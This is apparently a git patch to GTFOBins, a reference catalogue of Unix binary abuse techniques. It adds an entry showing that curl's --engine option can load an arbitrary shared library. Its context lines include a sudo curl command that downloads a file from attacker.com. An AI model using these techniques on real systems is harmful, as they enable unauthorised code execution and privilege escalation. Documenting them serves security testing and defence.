From c7efefee7dadea244a322da996d701ddcd1eb5fb Mon Sep 17 00:00:00 2001 From: Aaron Dewes Date: Fri, 15 Aug 2025 10:54:39 +0200 Subject: [PATCH] Add library load via `--engine` to curl --- _gtfobins/curl.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/_gtfobins/curl.md b/_gtfobins/curl.md index 6a7149da..18611dd4 100644 --- a/_gtfobins/curl.md +++ b/_gtfobins/curl.md @@ -36,4 +36,8 @@ functions: URL=http://attacker.com/file_to_get LFILE=file_to_save sudo curl $URL -o $LFILE + library-load: + - description: Load a shared library as OpenSSL engine. Only works if curl is compiled with OpenSSL and OpenSSL has engine support enabled. + code: | + curl --engine /path/to/library.so https://example.com ---